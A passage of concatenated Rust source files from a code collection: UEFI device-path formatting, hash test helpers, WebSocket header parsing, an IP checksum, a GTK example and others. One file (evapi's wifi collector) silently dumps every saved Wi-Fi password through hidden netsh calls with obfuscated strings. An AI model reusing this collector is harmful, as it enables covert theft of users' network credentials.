                        },
                        DevicePathMessagingType::Nvme if node_data.len() == 12 => {
                            let nsid = read_u32(0);
                            let eui = &node_data[4..];
                            // An all-zero EUI-64 means "not provided".
                            if eui == &[0, 0, 0, 0, 0, 0, 0, 0] {
                                write!(s, "NVMe(0x{:X})", nsid)
                            } else {
                                write!(
                                    s,
                                    "NVMe(0x{:X},{:02X}-{:02X}-{:02X}-{:02X}-{:02X}-{:02X}-{:02X}-{:02X})",
                                    nsid,
                                    eui[0],
                                    eui[1],
                                    eui[2],
                                    eui[3],
                                    eui[4],
                                    eui[5],
                                    eui[6],
                                    eui[7],
                                )
                            }
                        },
                        _ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
                    }
                    Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
                },
                DevicePathType::Media => match DevicePathMediaType::try_from(node.SubType) {
                    Ok(sub_type) => match sub_type {
                        DevicePathMediaType::Harddrive if node_data.len() == mem::size_of::<DevicePathHarddrive>() => {
                            // SAFETY hedge: relies on the firmware node data
                            // being exactly a packed DevicePathHarddrive —
                            // length is checked by the guard above.
                            let harddrive = unsafe { ptr::read(node_data.as_ptr() as *const DevicePathHarddrive) };
                            match harddrive.signature_type {
                                1 => {
                                    let id = unsafe { ptr::read(harddrive.partition_signature.as_ptr() as *const u32) };
                                    write!(s, "HD(0x{:X},MBR,0x{:X})", harddrive.partition_number, id)
                                },
                                2 => {
                                    let guid = unsafe { ptr::read(harddrive.partition_signature.as_ptr() as *const Guid) };
                                    write!(
                                        s,
                                        "HD(0x{:X},GPT,{:08X}-{:04X}-{:04X}-{:02X}{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X})",
                                        harddrive.partition_number,
                                        guid.0,
                                        guid.1,
                                        guid.2,
                                        guid.3[0],
                                        guid.3[1],
                                        guid.3[2],
                                        guid.3[3],
                                        guid.3[4],
                                        guid.3[5],
                                        guid.3[6],
                                        guid.3[7],
                                    )
                                },
                                _ => {
                                    write!(s, "HD(0x{:X},0x{:X},{:X?})", harddrive.partition_number, harddrive.signature_type, harddrive.partition_signature)
                                }
                            }
                        },
                        DevicePathMediaType::Filepath => {
                            // Decode UTF-16LE code units, mapping '\' to '/'.
                            // NOTE(review): from_u32_unchecked assumes valid
                            // code points; surrogates would be unsound here.
                            for chunk in node_data.chunks_exact(2) {
                                let data = (chunk[0] as u16) | (chunk[1] as u16) << 8;
                                match unsafe { char::from_u32_unchecked(data as u32) } {
                                    '\\' => s.push('/'),
                                    c => s.push(c),
                                }
                            }
                            Ok(())
                        },
                        _ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
                    }
                    Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
                },
                DevicePathType::Bbs => match DevicePathBbsType::try_from(node.SubType) {
                    Ok(sub_type) => match sub_type {
                        _ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
                    }
                    Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
                },
                DevicePathType::End => match DevicePathEndType::try_from(node.SubType) {
                    Ok(sub_type) => match sub_type {
                        _ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
                    }
                    Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
                },
            },
            Err(()) => {
                write!(s, "0x{:02X} 0x{:02X} {:X?}", node.Type, node.SubType, node_data)
            },
        };
    }
    s
}
/// Newtype over a raw `DevicePath` reference, located via `Protocol`.
pub struct DevicePathProtocol(pub &'static mut DevicePath);
impl Protocol<DevicePath> for DevicePathProtocol {
    /// GUID used to locate the device path protocol on a handle.
    fn guid() -> Guid {
        uefi::guid::DEVICE_PATH_GUID
    }
    fn new(inner: &'static mut DevicePath) -> Self {
        Self(inner)
    }
}
/// Device path of the image this bootloader was loaded from.
pub struct LoadedImageDevicePathProtocol(pub &'static mut DevicePath);
impl Protocol<DevicePath> for LoadedImageDevicePathProtocol {
    /// GUID used to locate the loaded-image device path protocol.
    fn guid() -> Guid {
        uefi::guid::LOADED_IMAGE_DEVICE_PATH_GUID
    }
    fn new(inner: &'static mut DevicePath) -> Self {
        Self(inner)
    }
}
/// Iterator over device path nodes, yielding each node header together
/// with its trailing data bytes.
pub struct DevicePathIter<'a> {
    // Held only to tie the iterator's lifetime to the borrowed path.
    device_path: &'a DevicePath,
    // Raw cursor advanced by each node's self-reported length.
    node_ptr: *const DevicePath,
}
impl<'a> DevicePathIter<'a> {
    /// Starts iteration at the first node of `device_path`.
    pub fn new(device_path: &'a DevicePath) -> Self {
        Self {
            device_path,
            node_ptr: device_path as *const DevicePath,
        }
    }
}
impl<'a> Iterator for DevicePathIter<'a> {
    type Item = (&'a DevicePath, &'a [u8]);
    fn next(&mut self) -> Option<Self::Item> {
        // SAFETY: `node_ptr` starts at a valid node and is advanced only
        // by each node's self-reported `Length`; this assumes the
        // firmware provides a well-formed, End-terminated path —
        // a malformed Length would read out of bounds. TODO confirm.
        let node = unsafe { &*self.node_ptr };
        // The End node terminates iteration and is not yielded.
        if node.Type == DevicePathType::End as u8 {
            return None;
        }
        // SAFETY: node data follows the header; `Length` includes the
        // 4-byte header itself, hence the `saturating_sub(4)`.
        let node_data = unsafe {
            slice::from_raw_parts(
                self.node_ptr.add(1) as *mut u8,
                node.Length.saturating_sub(4) as usize,
            )
        };
        // Advance by the full node length (header + data) in bytes.
        self.node_ptr = (self.node_ptr as usize + node.Length as usize) as *const DevicePath;
        Some((node, node_data))
    }
}
| true |
1cc850929387a54746e3c62bf259fec8961127e5
|
Rust
|
digitalbitbox/bitbox02-firmware
|
/src/rust/vendor/digest/src/dev/fixed.rs
|
UTF-8
| 2,021 | 2.90625 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
use crate::{Digest, FixedOutput, FixedOutputReset, HashMarker, Update};
use core::fmt::Debug;
/// Fixed-output resettable digest test via the `Digest` trait
///
/// Feeds `input` whole, after a reset, and in chunk sizes 1..17,
/// checking every digest equals `output`. Returns `Some(description)`
/// naming the first failing scenario, or `None` on success.
pub fn fixed_reset_test<D>(input: &[u8], output: &[u8]) -> Option<&'static str>
where
    D: FixedOutputReset + Debug + Clone + Default + Update + HashMarker,
{
    let mut hasher = D::new();
    // Test that it works when accepting the message all at once
    hasher.update(input);
    // Clone before finalizing so `hasher2` carries the same state.
    let mut hasher2 = hasher.clone();
    if hasher.finalize()[..] != output[..] {
        return Some("whole message");
    }
    // Test if reset works correctly
    hasher2.reset();
    hasher2.update(input);
    if hasher2.finalize_reset()[..] != output[..] {
        return Some("whole message after reset");
    }
    // Test that it works when accepting the message in chunks
    for n in 1..core::cmp::min(17, input.len()) {
        let mut hasher = D::new();
        for chunk in input.chunks(n) {
            hasher.update(chunk);
            // `hasher2` is reused across iterations; `finalize_reset`
            // below returns it to a clean state each time.
            hasher2.update(chunk);
        }
        if hasher.finalize()[..] != output[..] {
            return Some("message in chunks");
        }
        if hasher2.finalize_reset()[..] != output[..] {
            return Some("message in chunks");
        }
    }
    None
}
/// Fixed-output digest test via the `FixedOutput` trait
/// (previous doc comment wrongly said "Variable-output resettable";
/// this test neither resets nor uses variable output).
///
/// Feeds `input` whole and in chunk sizes 1..17, checking every digest
/// equals `output`. Returns `Some(description)` naming the first
/// failing scenario, or `None` on success.
pub fn fixed_test<D>(input: &[u8], output: &[u8]) -> Option<&'static str>
where
    D: FixedOutput + Default + Debug + Clone,
{
    let mut hasher = D::default();
    // Test that it works when accepting the message all at once
    hasher.update(input);
    if hasher.finalize_fixed()[..] != output[..] {
        return Some("whole message");
    }
    // Test that it works when accepting the message in chunks
    for n in 1..core::cmp::min(17, input.len()) {
        let mut hasher = D::default();
        for chunk in input.chunks(n) {
            hasher.update(chunk);
        }
        if hasher.finalize_fixed()[..] != output[..] {
            return Some("message in chunks");
        }
    }
    None
}
| true |
58fe0d91f798559c199af00f6602840b69a9d9ef
|
Rust
|
wyyerd/stripe-rs
|
/src/resources/token_ext.rs
|
UTF-8
| 811 | 3.46875 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
use serde_derive::{Deserialize, Serialize};
/// An enum representing the possible values of an `Token`'s `type` field.
#[derive(Copy, Clone, Debug, Deserialize, Serialize, Eq, PartialEq)]
#[serde(rename_all = "snake_case")]
pub enum TokenType {
    Account,
    BankAccount,
    Card,
    Pii,
}
impl TokenType {
pub fn as_str(self) -> &'static str {
match self {
TokenType::Account => "account",
TokenType::BankAccount => "bank_account",
TokenType::Card => "card",
TokenType::Pii => "pii",
}
}
}
/// Delegates to `as_str` so the type works with `AsRef<str>` APIs.
impl AsRef<str> for TokenType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// Formats as the same snake_case string returned by `as_str`.
impl std::fmt::Display for TokenType {
    fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
        self.as_str().fmt(f)
    }
}
| true |
12834eb3c83daf264ed88962c6629ce3da66307e
|
Rust
|
Muqito/ws-lite
|
/src/accept/ws_headers.rs
|
UTF-8
| 7,058 | 2.734375 | 3 |
[] |
no_license
|
/// The two request headers needed for a WebSocket handshake, borrowed
/// zero-copy from the raw request text.
#[derive(Debug)]
pub struct WsHeaders<'a> {
    upgrade: Option<&'a str>,
    websocket_key: Option<&'a str>,
}
impl<'a> WsHeaders<'a> {
    /// Creates an empty header set with neither header present.
    pub fn new() -> Self {
        Self {
            upgrade: None,
            websocket_key: None,
        }
    }
    /// Lookup by header name for the two supported headers; any other
    /// name returns `None`.
    pub fn get(&self, key: &str) -> Option<&'a str> {
        match key {
            "Upgrade" => self.get_upgrade(),
            "Sec-WebSocket-Key" => self.get_key(),
            _ => None,
        }
    }
    pub fn get_upgrade(&self) -> Option<&'a str> {
        self.upgrade
    }
    pub fn get_key(&self) -> Option<&'a str> {
        self.websocket_key
    }
    /// True when the request asked to upgrade to the WebSocket protocol.
    pub fn is_websocket(&self) -> bool {
        matches!(self.upgrade, Some("websocket"))
    }
    /// True when a `Sec-WebSocket-Key` header was present.
    ///
    /// Fixed: this previously tested `self.upgrade`, so a request with
    /// an `Upgrade` header but no key would falsely report having one.
    pub fn has_key(&self) -> bool {
        self.websocket_key.is_some()
    }
}
/// Extracts the `Upgrade` and `Sec-WebSocket-Key` headers from a raw
/// HTTP request without allocating; unknown rows are ignored.
fn get_ws_headers_from_str<'a>(input: &'a str) -> WsHeaders<'a> {
    let mut ws_headers = WsHeaders::new();
    for row in input.split("\r\n") {
        let mut parts = row.splitn(2, ": ");
        let key = parts.next();
        let value = parts.next();
        match key {
            Some("Upgrade") => ws_headers.upgrade = value,
            Some("Sec-WebSocket-Key") => ws_headers.websocket_key = value,
            _ => {}
        }
    }
    ws_headers
}
/// Parses the headers straight out of a raw request string.
impl<'a> From<&'a str> for WsHeaders<'a> {
    fn from(input: &'a str) -> Self {
        get_ws_headers_from_str(input)
    }
}
/// Convenience impl for `Cow` inputs (e.g. `String::from_utf8_lossy`).
impl<'a> From<&'a std::borrow::Cow<'a, str>> for WsHeaders<'a> {
    fn from(input: &'a std::borrow::Cow<'a, str>) -> WsHeaders<'a> {
        get_ws_headers_from_str(&input)
    }
}
#[cfg(test)]
mod tests {
use super::*;
use std::collections::HashMap;
const BUFFER: [u8; 503] = {
[
71, 69, 84, 32, 47, 32, 72, 84, 84, 80, 47, 49, 46, 49, 13, 10, 72, 111, 115, 116, 58,
32, 91, 58, 58, 49, 93, 58, 51, 51, 51, 51, 13, 10, 85, 115, 101, 114, 45, 65, 103,
101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87,
105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 105, 110, 54,
52, 59, 32, 120, 54, 52, 59, 32, 114, 118, 58, 56, 51, 46, 48, 41, 32, 71, 101, 99,
107, 111, 47, 50, 48, 49, 48, 48, 49, 48, 49, 32, 70, 105, 114, 101, 102, 111, 120, 47,
56, 51, 46, 48, 13, 10, 65, 99, 99, 101, 112, 116, 58, 32, 42, 47, 42, 13, 10, 65, 99,
99, 101, 112, 116, 45, 76, 97, 110, 103, 117, 97, 103, 101, 58, 32, 115, 118, 45, 83,
69, 44, 115, 118, 59, 113, 61, 48, 46, 56, 44, 101, 110, 45, 85, 83, 59, 113, 61, 48,
46, 53, 44, 101, 110, 59, 113, 61, 48, 46, 51, 13, 10, 65, 99, 99, 101, 112, 116, 45,
69, 110, 99, 111, 100, 105, 110, 103, 58, 32, 103, 122, 105, 112, 44, 32, 100, 101,
102, 108, 97, 116, 101, 13, 10, 83, 101, 99, 45, 87, 101, 98, 83, 111, 99, 107, 101,
116, 45, 86, 101, 114, 115, 105, 111, 110, 58, 32, 49, 51, 13, 10, 79, 114, 105, 103,
105, 110, 58, 32, 109, 111, 122, 45, 101, 120, 116, 101, 110, 115, 105, 111, 110, 58,
47, 47, 55, 50, 48, 99, 48, 50, 54, 48, 45, 97, 99, 56, 51, 45, 52, 102, 100, 101, 45,
98, 100, 53, 102, 45, 101, 51, 51, 49, 50, 55, 102, 100, 57, 101, 50, 98, 13, 10, 83,
101, 99, 45, 87, 101, 98, 83, 111, 99, 107, 101, 116, 45, 69, 120, 116, 101, 110, 115,
105, 111, 110, 115, 58, 32, 112, 101, 114, 109, 101, 115, 115, 97, 103, 101, 45, 100,
101, 102, 108, 97, 116, 101, 13, 10, 83, 101, 99, 45, 87, 101, 98, 83, 111, 99, 107,
101, 116, 45, 75, 101, 121, 58, 32, 43, 88, 49, 72, 80, 102, 74, 51, 74, 48, 90, 118,
80, 97, 70, 104, 108, 113, 73, 65, 109, 103, 61, 61, 13, 10, 67, 111, 110, 110, 101,
99, 116, 105, 111, 110, 58, 32, 107, 101, 101, 112, 45, 97, 108, 105, 118, 101, 44, 32,
85, 112, 103, 114, 97, 100, 101, 13, 10, 80, 114, 97, 103, 109, 97, 58, 32, 110, 111,
45, 99, 97, 99, 104, 101, 13, 10, 67, 97, 99, 104, 101, 45, 67, 111, 110, 116, 114,
111, 108, 58, 32, 110, 111, 45, 99, 97, 99, 104, 101, 13, 10, 85, 112, 103, 114, 97,
100, 101, 58, 32, 119, 101, 98, 115, 111, 99, 107, 101, 116, 13, 10, 13, 10,
]
};
// This is how you could write a naive HashMap of HTTP requests
// Naive HTTP header parser: splits the raw request on CRLF and keeps
// every "Key: Value" row, borrowing both key and value from `input`.
// Rows without a ": " separator (the request line, the blank terminator)
// are skipped; a repeated header keeps its last occurrence.
fn get_headers_from_str<'a>(input: &'a str) -> HashMap<&'a str, &'a str> {
    let mut headers = HashMap::new();
    for row in input.split("\r\n") {
        if let Some(sep) = row.find(": ") {
            headers.insert(&row[..sep], &row[sep + 2..]);
        }
    }
    headers
}
#[test]
fn should_convert_properly() {
let input = String::from_utf8_lossy(&BUFFER);
let result = get_headers_from_str(&input);
assert_eq!(result.get("Sec-WebSocket-Version"), Some(&"13"));
assert_eq!(result.get("Accept"), Some(&"*/*"));
assert_eq!(
result.get("Accept-Language"),
Some(&"sv-SE,sv;q=0.8,en-US;q=0.5,en;q=0.3")
);
assert_eq!(
result.get("Origin"),
Some(&"moz-extension://720c0260-ac83-4fde-bd5f-e33127fd9e2b")
);
assert_eq!(
result.get("Sec-WebSocket-Extensions"),
Some(&"permessage-deflate")
);
assert_eq!(
result.get("Sec-WebSocket-Key"),
Some(&"+X1HPfJ3J0ZvPaFhlqIAmg==")
);
assert_eq!(result.get("Connection"), Some(&"keep-alive, Upgrade"));
assert_eq!(result.get("Pragma"), Some(&"no-cache"));
assert_eq!(result.get("Cache-Control"), Some(&"no-cache"));
assert_eq!(result.get("Host"), Some(&"[::1]:3333"));
assert_eq!(result.get("Upgrade"), Some(&"websocket"));
assert_eq!(
result.get("User-Agent"),
Some(&"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0")
);
assert_eq!(result.get("Accept-Encoding"), Some(&"gzip, deflate"));
}
#[test]
fn should_convert_properly_ws_headers() {
    let input = String::from_utf8_lossy(&BUFFER);
    // `get_ws_headers_from_str` is defined outside this excerpt; judging
    // by the asserts its getter returns `Some("…")` (plain `&str`),
    // unlike the `HashMap` variant above which yields `Some(&"…")`.
    let result = get_ws_headers_from_str(&input);
    assert_eq!(
        result.get("Sec-WebSocket-Key"),
        Some("+X1HPfJ3J0ZvPaFhlqIAmg==")
    );
    assert_eq!(result.get("Upgrade"), Some("websocket"));
}
#[cfg(feature = "count-allocations")]
#[test]
fn should_barely_allocate_anything() {
    // The HashMap-based parser borrows keys and values, so only a handful
    // of allocations remain — presumably the map's internal tables
    // (TODO confirm what the 3 counted allocations are).
    let pt_alloc = allocation_counter::count(|| {
        let input = String::from_utf8_lossy(&BUFFER);
        let _result = get_headers_from_str(&input);
    });
    assert_eq!(pt_alloc, 3);
}
#[cfg(feature = "count-allocations")]
#[test]
fn should_not_allocate_anything() {
    // The specialised WebSocket-header variant is expected to be fully
    // allocation-free (its implementation lives outside this excerpt).
    let pt_alloc = allocation_counter::count(|| {
        let input = String::from_utf8_lossy(&BUFFER);
        let _result = get_ws_headers_from_str(&input);
    });
    assert_eq!(pt_alloc, 0);
}
}
| true |
01c388705a8c48e25950ef0e9c786f4040f87fac
|
Rust
|
sharksforarms/rust-packet
|
/src/layer/ip/mod.rs
|
UTF-8
| 1,401 | 2.96875 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
/*!
Ipv4 and Ipv6 layer
*/
#[macro_use]
pub mod ipv4;
pub mod ipv6;
pub mod protocols;
pub use ipv4::Ipv4;
pub use ipv6::Ipv6;
pub use protocols::IpProtocol;
use crate::layer::LayerError;
use std::convert::TryInto;
/// Computes the Internet checksum (RFC 1071) over `input`.
///
/// The data is summed as big-endian 16-bit words (an odd trailing byte is
/// padded with a zero low byte), the carries are folded back in, and the
/// one's complement of the folded sum is returned. This function currently
/// never fails; the `Result` is kept for signature consistency with the
/// other layer helpers.
pub fn checksum(input: &[u8]) -> Result<u16, LayerError> {
    // Accumulate in u64 so no realistic input length can overflow the sum
    // (the previous u32 accumulator could overflow — panicking in debug
    // builds — for inputs larger than ~256 KiB).
    let mut chunks_iter = input.chunks_exact(2);
    let mut sum: u64 = chunks_iter
        .by_ref()
        .map(|chunk| u64::from(u16::from_be_bytes([chunk[0], chunk[1]])))
        .sum();
    if let [rem] = chunks_iter.remainder() {
        sum += u64::from(u16::from_be_bytes([*rem, 0x00]));
    }
    // End-around carry: fold the upper bits back in until only 16 remain.
    while sum >> 16 != 0 {
        sum = (sum & 0xffff) + (sum >> 16);
    }
    Ok(!(sum as u16))
}
#[cfg(test)]
mod tests {
    use super::*;
    use hex_literal::hex;
    use rstest::*;
    // "calculate" cases feed a header whose checksum field is zeroed and
    // expect the computed value; "validate" cases feed the same header
    // with the checksum filled in, which must fold to 0. The `_rem`
    // variants append an odd trailing byte to exercise the remainder path.
    #[rstest(input, expected,
        case::calculate(&hex!("45000073000040004011 0000 c0a80001c0a800c7"), 0xB861),
        case::validate(&hex!("45000073000040004011 B861 c0a80001c0a800c7"), 0x0000),
        case::calculate_rem(&hex!("45000073000040004011 0000 c0a80001c0a800c7aa"), 0x0E61),
        case::validate_rem(&hex!("45000073000040004011 0E61 c0a80001c0a800c7aa"), 0x0000),
    )]
    fn test_checksum(input: &[u8], expected: u16) {
        let chksum = checksum(&input).unwrap();
        assert_eq!(expected, chksum);
    }
}
| true |
2ef426d92bd1e707421c54873e48a76e84fddbcf
|
Rust
|
lambinoo/evapi
|
/src/collectors/wifi.rs
|
UTF-8
| 1,927 | 2.65625 | 3 |
[] |
no_license
|
use std::{collections::HashMap, process::Command};
use std::{os::windows::process::CommandExt, time::Duration};
use tokio::time::delay_for;
use winapi::um::winbase::CREATE_NO_WINDOW;
pub type WifiLogins = HashMap<String, String>;
/// Runs `netsh wlan show profile <ssid> key=clear` and returns its raw
/// stdout, or `None` if the process could not be spawned/run.
///
/// All fixed strings go through `obfstr!` so they are obfuscated in the
/// compiled binary. NOTE(review): the 10 ms delay before spawning looks
/// like throttling between successive netsh invocations — confirm intent.
async fn get_wifi_profile(ssid: &str) -> Option<String> {
    delay_for(Duration::from_millis(10)).await;
    let output = Command::new(obfstr::obfstr!("netsh.exe"))
        .args(&[
            obfstr::obfstr!("wlan"),
            obfstr::obfstr!("show"),
            obfstr::obfstr!("profile"),
            ssid,
            obfstr::obfstr!("key=clear"),
        ])
        // Prevent a console window from flashing up on Windows.
        .creation_flags(CREATE_NO_WINDOW)
        .output()
        .ok()?;
    Some(String::from_utf8_lossy(&output.stdout).to_string())
}
/// Enumerates saved WLAN profiles via `netsh wlan show profile` and
/// collects each SSID's clear-text key into a map.
///
/// Returns `None` when `netsh` cannot be spawned or a per-profile query
/// fails. All string literals go through `obfstr!` to keep them out of
/// the binary's plain-text strings.
pub async fn dump_wifi_passwords() -> Option<WifiLogins> {
    let output = Command::new(obfstr::obfstr!("netsh.exe"))
        .args(&[
            obfstr::obfstr!("wlan"),
            obfstr::obfstr!("show"),
            obfstr::obfstr!("profile"),
        ])
        // Don't flash a console window on Windows.
        .creation_flags(CREATE_NO_WINDOW)
        .output()
        .ok()?;
    let mut wifi_logins = WifiLogins::new();
    let list_of_process = String::from_utf8_lossy(&output.stdout);
    for line in list_of_process.lines() {
        // Lines of interest look like "    All User Profile     : <SSID>".
        if line
            .to_lowercase()
            .contains(obfstr::obfstr!("all user profile"))
            && line.contains(":")
        {
            let ssid = line.split(':').nth(1)?.trim();
            let profile = get_wifi_profile(ssid).await?;
            for pline in profile.lines() {
                // "    Key Content            : <password>"
                if pline
                    .to_lowercase()
                    .contains(obfstr::obfstr!("key content"))
                    && pline.contains(":")
                {
                    // Fix: skip a malformed line (":" present but no ": ")
                    // instead of `?`-returning `None`, which used to throw
                    // away every credential gathered so far.
                    if let Some(key) = pline.split(": ").nth(1) {
                        wifi_logins.insert(ssid.to_string(), key.to_string());
                    }
                }
            }
        }
    }
    Some(wifi_logins)
}
| true |
0eba926b95742e07ef5f784f59c81eae47f53701
|
Rust
|
StephanvanSchaik/gtk
|
/examples/src/treeview.rs
|
UTF-8
| 2,614 | 3.125 | 3 |
[
"MIT"
] |
permissive
|
//! # TreeView Sample
//!
//! This sample demonstrates how to create a TreeView with either a ListStore or TreeStore.
extern crate glib;
extern crate gtk;
use gtk::Connect;
use gtk::traits::*;
use gtk::signals::DeleteEvent;
// Adds a single text column to `tree`, rendering model column 0 as the
// cell text.
fn append_text_column(tree: &mut gtk::TreeView) {
    let column = gtk::TreeViewColumn::new().unwrap();
    let cell = gtk::CellRendererText::new().unwrap();
    column.pack_start(&cell, true);
    // Bind the renderer's "text" property to model column 0.
    column.add_attribute(&cell, "text", 0);
    tree.append_column(&column);
}
// Builds the demo UI: a horizontal box holding two TreeViews — a flat
// list (ListStore) on the left and a two-level tree (TreeStore) on the
// right.
//
// NOTE(review): this targets a very old gtk-rs API in which constructors
// return `Option` and are `unwrap`ped; it will not build against current
// gtk-rs releases.
fn main() {
    gtk::init();
    let mut window = gtk::Window::new(gtk::WindowType::TopLevel).unwrap();
    window.set_title("TreeView Sample");
    window.set_window_position(gtk::WindowPosition::Center);
    // Quit the GTK main loop when the window is closed.
    Connect::connect(&window, DeleteEvent::new(&mut |_| {
        gtk::main_quit();
        true
    }));
    // test Value
    let hello = String::from("Hello world !");
    let value = glib::Value::new().unwrap();
    value.init(glib::Type::String);
    value.set(&hello);
    println!("gvalue.get example : {}", value.get::<String>());
    // left pane
    let mut left_tree = gtk::TreeView::new().unwrap();
    let column_types = [glib::Type::String];
    let left_store = gtk::ListStore::new(&column_types).unwrap();
    let left_model = left_store.get_model().unwrap();
    left_tree.set_model(&left_model);
    left_tree.set_headers_visible(false);
    append_text_column(&mut left_tree);
    // Ten identical flat rows.
    for _ in 0..10 {
        let mut iter = gtk::TreeIter::new().unwrap();
        left_store.append(&mut iter);
        left_store.set_string(&iter, 0, "I'm in a list");
    }
    // right pane
    let mut right_tree = gtk::TreeView::new().unwrap();
    let column_types = [glib::Type::String];
    let right_store = gtk::TreeStore::new(&column_types).unwrap();
    let right_model = right_store.get_model().unwrap();
    right_tree.set_model(&right_model);
    right_tree.set_headers_visible(false);
    append_text_column(&mut right_tree);
    // Ten parent rows (set from the GValue built above), each carrying
    // one child row.
    for _ in 0..10 {
        let mut iter = gtk::TreeIter::new().unwrap();
        right_store.append(&mut iter, None);
        right_store.set_value(&iter, 0, &value);
        let mut child_iter = gtk::TreeIter::new().unwrap();
        right_store.append(&mut child_iter, Some(&iter));
        right_store.set_string(&child_iter, 0, "I'm a child node");
    }
    // display the panes
    let mut split_pane = gtk::Box::new(gtk::Orientation::Horizontal, 10).unwrap();
    split_pane.set_size_request(-1, -1);
    split_pane.add(&left_tree);
    split_pane.add(&right_tree);
    window.add(&split_pane);
    window.show_all();
    gtk::main();
}
| true |
0b6ffd35b3b58aa801979b74500fecca5ed394bf
|
Rust
|
makers-for-life/makair-telemetry
|
/src/locale.rs
|
UTF-8
| 2,999 | 3.234375 | 3 |
[
"Unlicense",
"LicenseRef-scancode-public-domain"
] |
permissive
|
// MakAir Telemetry
//
// Copyright: 2020, Makers For Life
// License: Public Domain License
use std::convert::TryFrom;
use std::ops::RangeInclusive;
/// An ISO 639-1 language code to be used to choose language for the whole system
///
/// The two ASCII characters are packed into a `u16`: first byte in the
/// high half, second byte in the low half.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[cfg_attr(
    feature = "serde-messages",
    derive(serde::Serialize, serde::Deserialize)
)]
pub struct Locale(u16);

impl Locale {
    /// Create a locale from a u16.
    ///
    /// Returns `None` when the two packed bytes do not form a valid
    /// two-character ASCII code (validated by rendering the bytes and
    /// round-tripping through `TryFrom<&str>`).
    pub fn try_from_u16(num: u16) -> Option<Self> {
        Self::try_from(Self(num).to_string().as_str()).ok()
    }

    /// Language code as a u16
    pub fn as_u16(&self) -> u16 {
        self.0
    }

    /// Language code as a usize
    pub fn as_usize(&self) -> usize {
        self.0.into()
    }

    /// Allowed value bounds (this is not really correct/useful)
    pub fn bounds() -> RangeInclusive<usize> {
        RangeInclusive::new(
            Self::try_from("aa").unwrap().as_usize(),
            Self::try_from("zz").unwrap().as_usize(),
        )
    }
}

impl TryFrom<&str> for Locale {
    type Error = &'static str;

    /// Packs a two-character ASCII code into a `Locale`.
    ///
    /// Rejects input that is not exactly two bytes long and — unlike the
    /// previous byte-length-only check — also rejects non-ASCII input
    /// such as `"é"`, whose UTF-8 encoding happens to be two bytes while
    /// not being a legal ISO 639-1 code.
    fn try_from(value: &str) -> Result<Self, Self::Error> {
        if value.len() == 2 && value.is_ascii() {
            let bytes = value.as_bytes();
            let w = ((bytes[0] as u16) << 8) | bytes[1] as u16;
            Ok(Locale(w))
        } else {
            Err("language code must be exactly 2 characters, according to ISO 639-1")
        }
    }
}

impl Default for Locale {
    /// English (`"en"`) is the default locale.
    fn default() -> Self {
        Locale::try_from("en").unwrap()
    }
}

impl std::fmt::Display for Locale {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Unpack the big-endian byte pair; lossy conversion maps any
        // non-ASCII byte to U+FFFD (3 UTF-8 bytes), which is exactly what
        // makes `try_from_u16` reject invalid codes on the round trip.
        let bytes = self.0.to_be_bytes();
        let str = String::from_utf8_lossy(&bytes);
        f.write_str(&str)
    }
}
#[cfg(test)]
mod tests {
    use super::Locale;
    use proptest::prelude::*;
    use std::convert::TryFrom;
    // "fr" packed big-endian: 'f' = 0x66, 'r' = 0x72.
    const FR: u16 = 0x6672;
    // Arbitrary u16s filtered down to those whose byte pair renders as
    // pure ASCII — i.e. the codes `try_from_u16` is meant to accept.
    fn ui_locale_strategy() -> impl Strategy<Value = Locale> {
        proptest::num::u16::ANY.prop_filter_map("Invalid UI locale code", |code| {
            let ui_locale = Locale(code);
            if ui_locale.to_string().is_ascii() {
                Some(ui_locale)
            } else {
                None
            }
        })
    }
    #[test]
    fn from_str_fr() {
        assert_eq!(Locale::try_from("fr").map(|code| code.as_u16()), Ok(FR));
    }
    #[test]
    fn from_str_empty() {
        assert!(Locale::try_from("").is_err())
    }
    #[test]
    fn from_str_too_long() {
        assert!(Locale::try_from("fra").is_err())
    }
    #[test]
    fn to_str() {
        assert_eq!(Locale(FR).to_string().as_str(), "fr")
    }
    // Round-trip property: any accepted code survives Display -> TryFrom.
    proptest! {
        #[test]
        fn back_and_forth(ui_locale in ui_locale_strategy()) {
            let str = ui_locale.to_string();
            assert_eq!(Locale::try_from(str.as_str()).map(|code| code.as_u16()), Ok(ui_locale.as_u16()))
        }
    }
}
| true |
1bd390ce94680a708998cf78b6884f99f0196c7c
|
Rust
|
liweilijie/rust
|
/basic/fs/src/fs.rs
|
UTF-8
| 2,502 | 3.703125 | 4 |
[] |
no_license
|
use std::error::Error;
use std::fs::{File, OpenOptions};
use std::io::prelude::*;
use std::path::Path;
/// Opens `hello.txt` from the current directory and prints its contents.
///
/// Errors are reported on stdout rather than returned, mirroring the
/// original demo behaviour.
pub fn open_and_read() {
    let path = Path::new("hello.txt");
    let display = path.display();

    // `Error::description()` is deprecated; the `Display` impl of the
    // error produces the same (or a better) message.
    let mut file = match File::open(&path) {
        Err(why) => {
            println!("couldn't open {}: {}", display, why);
            return;
        }
        Ok(f) => f,
    };

    let mut s = String::new();
    match file.read_to_string(&mut s) {
        Err(e) => println!("couldn't read {}:{}", display, e),
        Ok(_) => println!("{} contains:\n{}", display, s),
    }
}
use std::io::{self, BufReader};
// Read the file line by line and print each line (debug-formatted).
// NOTE(review): the path is hard-coded to a developer machine, so this
// simply returns an `Err` anywhere else.
